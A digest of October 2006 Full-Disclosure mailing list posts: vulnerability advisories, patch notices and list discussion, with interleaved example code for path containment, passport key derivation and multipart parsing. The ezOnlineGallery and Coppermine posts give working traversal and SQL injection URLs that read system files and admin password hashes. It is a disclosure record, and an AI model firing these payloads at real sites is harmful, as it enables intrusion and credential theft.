Re: [Full-disclosure] Yahoo! Messenger Service 18 Remote Buffer Overflow Vulnerability
Did Yahoo put out a security notification yet? I don't see any mention of a bug fix on the Yahoo Messenger page. And when I turn on my Yahoo Messenger (ver 8.0.0.701), shouldn't I be alerted to receive an update?

- Siddhartha

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Gadi Evron
Sent: Thursday, October 26, 2006 7:46 AM
To: [EMAIL PROTECTED]
Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
Subject: Re: [Full-disclosure] Yahoo! Messenger Service 18 Remote Buffer Overflow Vulnerability

On Thu, 26 Oct 2006 [EMAIL PROTECTED] wrote:
> So how fast is this record time? As fast as Hitler's Blitzkrieg tactics? That's pretty fast!

Yahoo! released a fixed version.

Gadi.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] IE7 is a Source of Problem - Secunia IE7 Release Incident of October 2006
Hi.

On 10/27/06, LIUDIEYU dot COM [EMAIL PROTECTED] wrote:
> Upon IE7 release, Secunia published SA22477 titled `Internet Explorer 7 mhtml: Redirection Information Disclosure`.

It seems to be able to make redirecting with mhtml fail by returning the response with 201 or 202. Therefore, it is possible for this to prevent trying to steal the contents of your server via mhtml redirection.

--
HASEGAWA Yosuke
[EMAIL PROTECTED]
[Full-disclosure] MHL-2006-003 Public Advisory: ezOnlineGallery Multiple Security Issues
MHL-2006-003 - Public Advisory

+-------------------------------------------+
| ezOnlineGallery Multiple Security Issues  |
+-------------------------------------------+

PUBLISHED ON
October 26th, 2006

PUBLISHED AT
http://www.mayhemiclabs.com/advisories/MHL-2006-003.txt
http://www.mayhemiclabs.com/wiki/wikka.php?wakka=MHL2006003

PUBLISHED BY
Mayhemic Labs
http://www.mayhemiclabs.com
security AT mayhemiclabs DOT com
GPG key: 0x56143F84

APPLICATION
ezOnlineGallery
http://www.ezonlinegallery.com/

AFFECTED VERSIONS
Versions 1.3 and below

ISSUES
ezOnlineGallery allows disclosure of certain data about the system it is installed on.

1) Valid Path Disclosures

By editing the album variable when the show_album action is called on ezgallery.php, an attacker can verify the existence of any directory on a system. The system will attempt to display an album if the path is valid, and will return an error if the path is invalid.

EXAMPLE:
ezgallery.php?action=show_album&album=../../../../../etc/

2) File Disclosure

By editing both the album and image variables on image.php, an attacker can view any JPG, BMP, or PNG that the Apache process has read access to.

image.php?album=../../home/jrluser/girlfriendpics&image=nude.jpg

WORKAROUNDS
None at this time

SOLUTIONS
Upgrade to 1.3.2 Beta

REFERENCES
ezOnlineGallery - http://www.ezonlinegallery.com/

TIMELINE
October 26th, 2006
Vendor/Developer Notified
Vendor/Developer Fixes Issues
Public Release

ADDITIONAL CREDIT
N/A

LICENSE
Creative Commons Attribution-ShareAlike License
http://creativecommons.org/licenses/by-sa/2.5
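Both issues come down to the album and image parameters being joined onto a filesystem path without being confined to the gallery directory. The containment check below is an added example in Python, not ezOnlineGallery's own PHP code; the gallery root, the function names and the album names are assumptions, and the two request paths quoted in the advisory are used as the inputs that must be rejected.

```python
# Added example (not ezOnlineGallery's code): confine user-supplied album/image
# parameters to the gallery directory. GALLERY_ROOT is an assumed install path.
import os

GALLERY_ROOT = "/var/www/gallery/albums"          # assumption for this example
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".bmp", ".png"}


def resolve_inside_root(root, *parts):
    """Join the user-supplied parts under root and return the resolved path,
    or None if the result would escape root (directory traversal)."""
    root = os.path.realpath(root)
    for p in parts:
        # NUL bytes and absolute components are never legitimate here.
        if "\x00" in p or p.startswith(("/", "\\")) or os.path.isabs(p):
            return None
    # realpath collapses "..", symlinks and trailing slashes before comparing.
    candidate = os.path.realpath(os.path.join(root, *parts))
    # commonpath avoids the "/albums" vs "/albums2" prefix trap that a plain
    # startswith() check would fall into.
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def album_path(album):
    """Directory for ezgallery.php?action=show_album&album=..., or None."""
    return resolve_inside_root(GALLERY_ROOT, album)


def image_path(album, image):
    """File for image.php?album=...&image=..., or None if rejected."""
    if os.path.splitext(image)[1].lower() not in ALLOWED_EXTENSIONS:
        return None
    if "/" in image or "\\" in image or os.sep in image:
        return None                         # image must be a bare file name
    return resolve_inside_root(GALLERY_ROOT, album, image)


if __name__ == "__main__":
    # The two request paths from the advisory, and one legitimate request.
    print(album_path("../../../../../etc/"))                        # None
    print(image_path("../../home/jrluser/girlfriendpics", "nude.jpg"))  # None
    print(image_path("holiday2006", "IMG_0001.JPG"))
```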
Re: [Full-disclosure] Vulnerability automation and Botnet solutions I expect to see this year
*. Gadi Intelligence (very limited)

On 10/26/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
> On Tue, 24 Oct 2006 10:52:58 -0500 Gadi Evron [EMAIL PROTECTED] wrote:
> > So, what I am going to talk about... A tad bit of history on vulnerabilities and their use on the Internet, and then, what we are going to see on corporate, ISP and Internet security relating to botnets this coming year.
> >
> > Vulnerabilities don't exist for the sake of vulnerabilities. They are used for something, they are a tool. Botnets are much the same, using vulnerabilities on the next layer.
> >
> > This past year we have seen how disclosed vulnerabilities, patched vulnerabilities and 0days have been utilized by automated kits. An inter-linked system of websites which download malicious code (update the kits), try to infect millions of users from just a couple dozen main hubs, and react to the environment.
> >
> > If a certain vulnerability is seen to be more successful on certain OS types or if one is found to not work, the kit will be fixed accordingly and distributed. Often immediately after a patch Tuesday, likely that same Friday evening.
> >
> > This way, income can be maximized with the number of infections, data stolen and thus ROI. Both from the expected response time of the vendors as well as how many victims can be reached in that window.
> >
> > One such kit is Webattacker, which has recently been getting more known in public circles.
> >
> > Where we are
> >
> > That does it, botnets are mainstream. People did not yet understand the idea that software vulnerabilities facilitate an attack (=are not the attack) and botnets facilitate much the same, only on a different level. I will discuss that further after what interests everybody.
> >
> > Solutions in the coming year!
> >
> > First, many products in the industry have been implemented successfully in the past, just as solutions of necessity, not products. Some were successful, some failed. Some (services) have been supplied to the rich and connected, some haven't.
> >
> > Botnets are now main-stream, which means other lesser beings and corporations want these services. They want to be protected in a hostile world. They realize the Internet is not a safe place, and plan accordingly.
> >
> > Services we will see more and more of:
> >
> > *. Intelligence (very limited), showing IP addresses for botnet command and control (C&C) servers, which your computers may be connecting to (i.e. compromised).
> > *. Intelligence (very limited), showing IP addresses that you control which show in spam (meaning compromised hosts) or show in other ways in botnet data being collected. Mostly, this is spam-oriented and the rest of the intelligence is barely noticeable as of yet.
> > *. Intelligence (very limited) on the millions on millions of credentials (for sites, credit cards, banks, eCommerce systems, etc.) and identities being stolen every single day by massive phishing man-in-the-middle trojan horses.
> > *. Intelligence (very limited) other black listing services.
> >
> > In the past, a limited version of these services was provided, but very secretly, and at a very high cost.
> >
> > Products:
> >
> > Botnet products on the network can either detect internal problems (such as bots on the corporate or ISP network or the spreading of infections) or external problems (such as C&C servers or attacks from the world). These can be based on behavior or intelligence.
> >
> > Solutions, which we discussed in the past and are now going to manifest:
> >
> > Intelligence-based (until now only supplied by select groups to select groups) -
> > *. Known bad IPs. Etc. Much like in spam, only for other realms.
> > *. Known bad URLs or domain names. Etc. Much like in spam, only for other realms.
> >
> > Detection -
> > *. IDS approach (decent but not even close to cutting it),
> > *. DNS monitoring approach (very cool, but is just one approach in a layered solution).
> > *. Netflow approach (proven for years now, only one approach, however useful, which is growing more limited every day).
> >
> > Respond and quarantine -
> > *. Walled garden approach (close off/limit suspicious or confirmed compromised computers until they clean themselves. Not successful in current solutions, shows promise).
> > *. Try to fix the situation remotely (solve the vulnerabilities, etc. ahead of time or remove after the fact).
> >
> > There are several others, but these are the main ones describing the 10 or so products we are about to see (all of which are already available publicly as open source, privately developed tools or unsuccessful solutions due to lack of client awareness and interest).
> >
> > QoS, virtualization and half decent intelligence gathering will come next. Other solutions I will not waste breath speaking of right now, they will appear for public consumption once the effectiveness of the solutions above (or the better ones there) is done to dust.
> >
> > What's next?
> >
> > Decent, real decent, intelligence, and support response tools to mitigate what you find in conjunction with a response team trained to deal with thousands of real incidents rather than mark check-lists on a couple an hour to a couple a month. That's simply not being aware of what's happening in your network.
> >
> > Many
[Full-disclosure] [ Capture Skype traffic ]
All is in the mail's subject.
I need to match this crazy-encrypted-random traffic, to destroy it (I think I'm not alone to need information on this product).
I've found some work on the BlackHats slides, but Skype updates..

Thx in advance.

--
Tyop?
Student. Excuse my English.
[Full-disclosure] parallels Desktop file permission notice
While testing the useful Parallels for OS X, I noticed that this piece of software:

root  2818  0.0  0.0  31780  152  ??  Ss  5:33PM  0:01.57 /Library/StartupItems/Parallels/prl_dhcpd

wrote this file:

x:~ xxx$ ls -al /Library/Parallels/.dhcpd_configuration

with the following permission:

-rw-rw-rw-  1 root  wheel  0 Oct 26 17:32 /Library/Parallels/.dhcpd_configuration

The Parallels release is:
Parallels Desktop for Mac - Build 1940 (October 12, 2006)

Bye
-naif
Re: [Full-disclosure] [ Capture Skype traffic ]
Use a packet analyzer proxy, bluecoat comes to mind as one that works quite well...

Exibar

----- Original Message -----
From: Tyop? [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
Sent: Friday, October 27, 2006 7:27 AM
Subject: [Full-disclosure] [ Capture Skype traffic ]

> All is in the mail's subject.
> I need to match this crazy-encrypted-random traffic, to destroy it (I think I'm not alone to need information on this product).
> I've found some work on the BlackHats slides, but Skype updates..
>
> Thx in advance.
>
> --
> Tyop?
> Student. Excuse my English.
Re: [Full-disclosure] [ Capture Skype traffic ]
On 10/27/06, Exibar [EMAIL PROTECTED] wrote:
> From: Tyop? [EMAIL PROTECTED]
> > All is in the mail's subject.
> > I need to match this crazy-encrypted-random traffic, to destroy it (I think I'm not alone to need information on this product).
> > I've found some work on the BlackHats slides, but Skype updates..
>
> Use a packet analyzer proxy, bluecoat comes to mind as one that works quite well...

http://www.bluecoat.com/downloads/whitepapers/BCS_controlling_skype_wp.pdf

Bluecoat doesn't match the packets, sorry.

quote:
> It is also recommended that enterprises block downloads of URLs ending with skype.exe. This will prevent new Skype software from being downloaded to enterprise machines.

This is very funny. ^-^

--
Tyop?
Please excuse my English.
Re: [Full-disclosure] Vulnerability automation and Botnet solutions I expect to see this year
On 10/27/06, poo [EMAIL PROTECTED] wrote:
> *. Gadi Intelligence (very limited)

You are just jealous that he has a job in infosec, and you are a 3rd shift helpdesk technician. I guess the official ratio of trolls to normal people has passed 1:1 on FD, sweet!
[Full-disclosure] ZDI-06-035: Novell eDirectory NDS Server Host Header Buffer Overflow Vulnerability
ZDI-06-035: Novell eDirectory NDS Server Host Header Buffer Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-035.html
October 26, 2006

-- CVE ID:
CVE-2006-5478

-- Affected Vendor:
Novell

-- Affected Products:
Novell eDirectory 8.8.1

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability since October 26, 2006 by Digital Vaccine protection filter ID 4519. For further product information on the TippingPoint IPS:
http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Novell eDirectory. Authentication is not required to exploit this vulnerability.

The specific flaw exists within the httpstk.dll library within the dhost.exe web interface of the eDirectory Host Environment. The web interface does not validate the length of the HTTP Host header prior to using the value of that header in an HTTP redirect. This results in an exploitable stack-based buffer overflow.

-- Vendor Response:
Novell has issued an update to correct this vulnerability. More details can be found at:
http://support.novell.com/cgi-bin/search/searchtid.cgi?/2974592.htm
http://support.novell.com/cgi-bin/search/searchtid.cgi?/2974603.htm
http://support.novell.com/cgi-bin/search/searchtid.cgi?/3723994.htm

-- Disclosure Timeline:
2006.08.14 - Vulnerability reported to vendor
2006.10.26 - Digital Vaccine released to TippingPoint customers
2006.10.26 - Public release of advisory

-- Credit:
This vulnerability was discovered by Manuel Santamarina Suarez.

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.
[Full-disclosure] Coppermine 1.4.9 SQL injection
// http://www.w4cking.com

CREDIT: w4ck1ng.com

PRODUCT: Coppermine 1.4.9
http://coppermine-gallery.net/

VULNERABILITY: SQL Injection

NOTES:
- SQL injection can be used to obtain password hash
- You must be a registered user to access the vulnerable page, picmgr.php.
- The table prefix must be known.

POC:
victim/picmgr.php?aid=123%20UNION%20SELECT%20user_id,user_group,concat(user_name,char(58,58),user_password)%20FROM%20cpg149_users%20right%20join%20cpg149_usergroups%20on%20cpg149_users.user_group%20=%20cpg149_usergroups.group_id%20where%20cpg149_usergroups.has_admin_access%20=%201%20--

ADVISORY EXPLOIT (requires registration):
http://www.w4ck1ng.com/board/showthread.php?t=1856

//
[Full-disclosure] [ MDKSA-2006:188 ] - Updated mono packages fix vulnerability
Mandriva Linux Security Advisory                         MDKSA-2006:188
http://www.mandriva.com/security/
___

Package : mono
Date    : October 27, 2006
Affected: 2007.0
___

Problem Description:

Sebastian Krahmer of the SUSE security team found that the System.CodeDom.Compiler classes in mono used temporary files in an insecure way that could allow a symbolic link attack to overwrite arbitrary files with the privileges of the user running a program that made use of those classes.

Updated packages have been patched to correct this issue.
___

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5072
___

Updated Packages:

Mandriva Linux 2007.0:
Mandriva Linux 2007.0/X86_64:
___

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact security_(at)_mandriva.com
___

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com
[Full-disclosure] [ MDKSA-2006:189 ] - Updated xsupplicant fixes possible remote root stack smash vulnerability
Mandriva Linux Security Advisory                         MDKSA-2006:189
http://www.mandriva.com/security/
___

Package : xsupplicant
Date    : October 27, 2006
Affected: 2006.0, 2007.0
___

Problem Description:

Yannick Van Osselaer discovered a stack overflow in Xsupplicant, which could potentially be exploited by a remote, authenticated user to gain root privileges.

Additional code cleanups to fix potential memory leaks are also included.

Updated packages have been patched to correct this issue.
___

Updated Packages:

Mandriva Linux 2006.0:
Mandriva Linux 2006.0/X86_64:
Mandriva Linux 2007.0:
Mandriva Linux 2007.0/X86_64:
___

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact security_(at)_mandriva.com
___

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com
[Full-disclosure] [ MDKSA-2006:190 ] - Updated mutt packages fix multiple vulnerabilities
Mandriva Linux Security Advisory                         MDKSA-2006:190
http://www.mandriva.com/security/
___

Package : mutt
Date    : October 27, 2006
Affected: 2006.0, 2007.0, Corporate 3.0
___

Problem Description:

A race condition in the safe_open function in the Mutt mail client 1.5.12 and earlier, when creating temporary files in an NFS filesystem, allows local users to overwrite arbitrary files due to limitations of the use of the O_EXCL flag on NFS filesystems. (CVE-2006-5297)

The mutt_adv_mktemp function in the Mutt mail client 1.5.12 and earlier does not properly verify that temporary files have been created with restricted permissions, which might allow local users to create files with weak permissions via a race condition between the mktemp and safe_fopen function calls. (CVE-2006-5298)

Updated packages have been patched to correct these issues.
___

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5297
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5298
___

Updated Packages:

Mandriva Linux 2006.0:
Mandriva Linux 2006.0/X86_64:
Mandriva Linux 2007.0:
Mandriva Linux 2007.0/X86_64:
Corporate 3.0:
Corporate 3.0/X86_64:
___

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact security_(at)_mandriva.com
___

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com
[Full-disclosure] RFID enabled e-passport skimming proof of concept code released (RFIDIOt)
The latest version of RFIDIOt, the open-source Python library for RFID exploration/manipulation, contains code that implements the ICAO 9303 standard for Machine Readable Travel Documents in the form of a test program called 'mrpkey.py'.

This program will exchange crypto keys with the passport and read and display the contents therein, including the facial image and the personal data printed in the passport.

Currently the data read is limited to the following objects:

Data Group: 61 (EF.DG1 Data Recorded in MRZ)
Data Group: 75 (EF.DG2 Encoded Identification Features - FACE)

Other Data Groups will be implemented as and when examples come to the author's attention.

The ICAO standard relies on a 'secret' key to protect the RFID chip from casual reading, which is derived from data printed inside the passport. However, this data is also potentially available by other means, so the key for a specific passport could be derived without physical access to the passport. The information required is as follows:

The Passport number
The Date Of Birth of the holder
The Expiry Date of the Passport

(Each of the fields also has a check digit which can be calculated by the software if not otherwise available).

The author has previously shown that this data can be obtained through other channels, such as poorly secured websites, as it is a subset of the data that is required by the US Homeland Security for Advance Passenger Information, and is therefore commonly collected by airlines and other associated organisations.

This article, from the UK national newspaper The Guardian, gives more details of one of the techniques used:

http://www.guardian.co.uk/idcards/story/0,,1766266,00.html

Others have also highlighted the possibility of bruteforcing the keys, given that the components are largely predictable, giving a much smaller keyspace than might otherwise be supposed:

http://www.riscure.com/2_news/passport.html

The demonstration code (RFIDIOt.py version 0.1g) can be found here:

http://rfidiot.org

The ICAO 9303 standard documents can be found here:

http://www.icao.int/mrtd/publications/doc.cfm

Enjoy!

Adam
--
Adam Laurie                     Tel: +44 (0) 1304 814800
The Bunker Secure Hosting Ltd.  Fax: +44 (0) 1304 814899
Ash Radar Station               http://www.thebunker.net
Marshborough Road
Sandwich                        mailto:[EMAIL PROTECTED]
Kent CT13 0PL
UNITED KINGDOM                  PGP key on keyservers
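The key derivation the post refers to, written out as an added example that is not part of RFIDIOt or the original post: the ICAO 9303 check digit over each of the three printed fields, the SHA-1 key seed over the concatenated MRZ information, and the two 3DES keys (KENC for encryption, KMAC for message authentication) derived from that seed. It makes the post's point concrete: everything in the key comes from the document number, date of birth and expiry date. The sample field values are the worked example published in Doc 9303; the function names are this example's own.

```python
# Added example (not RFIDIOt's code): Basic Access Control key derivation as
# specified in ICAO Doc 9303, showing that the chip's "secret" key is a
# function of three printed fields only. Function names are this example's own.
import hashlib

# Check digit: weights 7,3,1 repeating; digits count as themselves,
# letters A-Z as 10-35, the filler character '<' as 0; result is sum mod 10.
_WEIGHTS = (7, 3, 1)


def _char_value(ch):
    if ch.isdigit():
        return int(ch)
    if "A" <= ch <= "Z":
        return ord(ch) - ord("A") + 10
    if ch == "<":
        return 0
    raise ValueError("invalid MRZ character %r" % ch)


def check_digit(field):
    """ICAO 9303 check digit for one MRZ field, returned as a one-char string."""
    total = sum(_char_value(c) * _WEIGHTS[i % 3] for i, c in enumerate(field))
    return str(total % 10)


def mrz_information(doc_number, birth_date, expiry_date):
    """MRZ_information = docnum||cd || dob||cd || expiry||cd.
    The document number is padded with '<' to 9 characters; dates are YYMMDD."""
    doc_number = doc_number.ljust(9, "<")
    return (doc_number + check_digit(doc_number)
            + birth_date + check_digit(birth_date)
            + expiry_date + check_digit(expiry_date))


def key_seed(mrz_info):
    """Kseed = first 16 bytes of SHA-1(MRZ_information)."""
    return hashlib.sha1(mrz_info.encode("ascii")).digest()[:16]


def _adjust_parity(key):
    """Set each byte's least significant bit so the byte has odd parity
    (the DES key convention Doc 9303 requires)."""
    out = bytearray()
    for b in key:
        if bin(b & 0xFE).count("1") % 2 == 0:
            b = (b & 0xFE) | 1
        else:
            b &= 0xFE
        out.append(b)
    return bytes(out)


def derive_key(seed, counter):
    """Doc 9303 3DES key derivation: SHA-1(Kseed || 32-bit counter), first
    16 bytes, parity adjusted. counter 1 gives KENC, counter 2 gives KMAC."""
    digest = hashlib.sha1(seed + counter.to_bytes(4, "big")).digest()
    return _adjust_parity(digest[:16])


def bac_keys(doc_number, birth_date, expiry_date):
    """Return (KENC, KMAC) for the three fields printed in the passport."""
    seed = key_seed(mrz_information(doc_number, birth_date, expiry_date))
    return derive_key(seed, 1), derive_key(seed, 2)


# Sample values: the worked example published in ICAO Doc 9303.
SAMPLE_DOC, SAMPLE_DOB, SAMPLE_EXPIRY = "L898902C", "690806", "940623"

if __name__ == "__main__":
    kenc, kmac = bac_keys(SAMPLE_DOC, SAMPLE_DOB, SAMPLE_EXPIRY)
    print("MRZ_information:", mrz_information(SAMPLE_DOC, SAMPLE_DOB, SAMPLE_EXPIRY))
    print("KENC:", kenc.hex())
    print("KMAC:", kmac.hex())
```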
Re: [Full-disclosure] IE7 is a Source of Problem - Secunia IE7 Release Incident of October 2006
Dear Mi/aster Liu Die Yu,

I would like to let you know that I know you and I greatly respect your work. I'm not a security expert, but when I speak about IE vulnerabilities, I speak about Liu Die Yu, just as when I speak about Oracle vulnerabilities, I speak about *Litchfield; when I speak about shatter attacks, I speak about Brett Moore; when I speak about games vulnerabilities, I speak about Luigi Auriemma; when I speak about web vulnerabilities, I speak about Rgod; when I speak about Office vulnerabilities, I speak about Class101; I speak also about HD Moore and more guys... It's just like speaking about reggae without speaking about Bob Marley, or about how to make money without speaking about Bill Gates (or Dave Aitel).

So, for you and these respectable legends: I SALUTE YOU!

We all have only one life, and not any time, but legends never die...

Thanks
/JA *

LIUDIEYU dot COM wrote:
> Upon IE7 release, Secunia published SA22477 titled `Internet Explorer 7 mhtml: Redirection Information Disclosure`.
>
> Here I figured a straightforward demo - navigate IE7 to:
> * mhtml:http://www.google.com/url?q=http://www.yahoo.com/
>
> Google redirects to Yahoo, Yahoo content is loaded, but browser location is not updated.
>
> Microsoft blogs assure vulnerability brought up by Secunia is not in IE7, technically, rather, it's Outlook Express; and as usual, words of Microsoft were well honored by several public media sources. Microsoft do not even send the slightest comment that IE is a source of problem - despite there involves cross-domain data compromise, HTTP redirection, ActiveX (DOM also works) ... all in all, when this attack happens, it got to be IE and no other.
>
> Let me sum up: in this case IE is vulnerable, only IE is vulnerable, and Microsoft say "These reports are technically inaccurate: the issue concerned in these reports is not in Internet Explorer 7 (or any other version) at all."
>
> Upon seeing mhtml:, it reminds of a magnificent historic incident which also involved mhtml: -- an IE exploit so perfectly and widely utilized that it made CERT suggest "Use a different web browser" (CERT KB VU#323070), and firstly initiated the boom of Firefox. Of course Microsoft is unlikely to say technically this is also not IE's problem.
>
> At last allow me to put an off-topic yet sentimental complaint ... Quite a while ago, when I got IE exploits and Secunia broadcasted about them, my name was in every news report; this month same situation, codedreamer - original finder of the mhtml: thing broadcasted by Secunia - was not properly given credit ... no mentioning in news reports, no mentioning in the famous first ever IE7 advisory SA22477, codedreamer made the whole thing yet Secunia gave but one single line of credit in bottom of demo: "The test is based on Proof of Concept code by codedreamer."
>
> Let me say I'm a man who believes in paying respect, thus I made this little complaint, paying my respect to codedreamer.
>
> Best Wishes for All Firefox Surfers and Firefox 2.0
>
> Liu Die Yu
> 25 OCT 06
[Full-disclosure] [ MDKSA-2006:192 ] - Updated ruby packages fix DoS vulnerability
Mandriva Linux Security Advisory MDKSA-2006:192
http://www.mandriva.com/security/

Package : ruby
Date: October 27, 2006
Affected: 2006.0, 2007.0, Corporate 3.0, Corporate 4.0

Problem Description:

The CGI library in Ruby 1.8 allowed a remote attacker to cause a Denial of Service via an HTTP request with a multipart MIME body that contained an invalid boundary specifier, which would result in an infinite loop and CPU consumption.

Updated packages have been patched to correct this issue.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5467

Updated Packages:

[md5 checksums and package file names for Mandriva Linux 2006.0, 2007.0, Corporate 3.0 and Corporate 4.0 (i586 and x86_64) omitted]

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed
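The advisory describes a multipart body with an invalid boundary sending the Ruby 1.8 CGI library into an endless loop. As an added example (not Mandriva's or Ruby's own code; the names `extract_boundary`, `parse_multipart` and `parse_multipart_safe` and the sample bodies are constructed here), this is the shape of a multipart reader that cannot spin: every iteration advances the scan offset, and a missing, mismatched or unclosed boundary is reported as an error.

```ruby
# Added example, not Mandriva's or Ruby's CGI code: a minimal multipart/form-data
# reader in which every loop iteration consumes input, so a body whose boundary
# is missing, mismatched or never closed yields an error instead of the endless
# loop described for CVE-2006-5467.
class MultipartError < StandardError; end

# Pull the boundary token out of a Content-Type value (RFC 2046: 1-70 chars).
def extract_boundary(content_type)
  m = %r{\Amultipart/form-data\s*;\s*boundary="?([^";\s]{1,70})"?\s*\z}i.match(content_type.to_s)
  raise MultipartError, "missing or invalid boundary parameter" unless m
  m[1]
end

# Split body into parts as an array of { headers:, body: } hashes.
# The scan offset only ever moves forward, and each String#index miss raises,
# so the loop terminates for any input.
def parse_multipart(content_type, body, max_parts: 100)
  delim = "--" + extract_boundary(content_type)
  raise MultipartError, "body does not start with boundary" unless body.start_with?(delim)
  parts = []
  pos = delim.length
  loop do
    tail = body[pos, 2]
    return parts if tail == "--"                 # closing delimiter "--boundary--"
    raise MultipartError, "malformed delimiter at offset #{pos}" unless tail == "\r\n"
    raise MultipartError, "more than #{max_parts} parts" if parts.size >= max_parts
    pos += 2
    hdr_end = body.index("\r\n\r\n", pos)
    raise MultipartError, "unterminated part headers" unless hdr_end
    next_delim = body.index("\r\n" + delim, hdr_end + 4)
    raise MultipartError, "closing boundary never found" unless next_delim
    parts << { headers: body[pos...hdr_end], body: body[(hdr_end + 4)...next_delim] }
    pos = next_delim + 2 + delim.length
  end
end

# Never-raising wrapper: [:ok, parts] or [:error, message].
def parse_multipart_safe(content_type, body)
  [:ok, parse_multipart(content_type, body)]
rescue MultipartError => e
  [:error, e.message]
end

# Constructed sample bodies: one well formed, one whose boundary never closes.
GOOD_BODY = "--XyZ\r\nContent-Disposition: form-data; name=\"a\"\r\n\r\nhello\r\n" \
            "--XyZ\r\nContent-Disposition: form-data; name=\"b\"\r\n\r\nworld\r\n--XyZ--\r\n"
BAD_BODY  = "--XyZ\r\nContent-Disposition: form-data; name=\"a\"\r\n\r\nhello"
```

Feeding BAD_BODY (or a body whose boundary does not match the Content-Type parameter) through `parse_multipart_safe` returns an `:error` tuple immediately rather than consuming CPU.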
Re: [Full-disclosure] [ Capture Skype trafic ]
gabriel rosenkoetter wrote:

> (That said... keeping people from using Skype on a corporate network is an HR problem, not a network management/security problem, methinks, just like any P2P software.)

Huh?? Final enforcement may be an HR problem, but if your corporate IT policies and system designs allow arbitrary users to run arbitrary, non-endorsed, perhaps not properly licensed, etc, etc, etc applications then your systems as a whole have much larger problems than Skype-stolen bandwidth usage...

Regards,

Nick FitzGerald
Re: [Full-disclosure] ZDI-06-035: Novell eDirectory NDS Server Host Header Buffer Overflow Vulnerability
On 10/27/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:

> -- TippingPoint(TM) IPS Customer Protection:
> TippingPoint IPS customers have been protected against this vulnerability since October 26, 2006 by Digital Vaccine protection filter ID 4519. For further product information on the TippingPoint IPS:

[snip]

> The specific flaw exists within the httpstk.dll library within the dhost.exe web interface of the eDirectory Host Environment. The web interface does not validate the length of the HTTP Host header prior to using the value of that header in an HTTP redirect. This results in an exploitable stack-based buffer overflow.

This 0day was reported on 10/20/06 here http://www.mnin.org/advisories/2006_novell_httpstk.pdf. Seems that your initiative has fallen a bit behind. Your customers had to wait for you to realize this had already been released and a signature was added to Bleeding Snort on 10/23. It's also a bit odd that Novell released the updates on 10/20/06, the same day as the MNIN advisory. Based on the time line it looks like the whole thing might have been ripped off.

Cheers,

Matt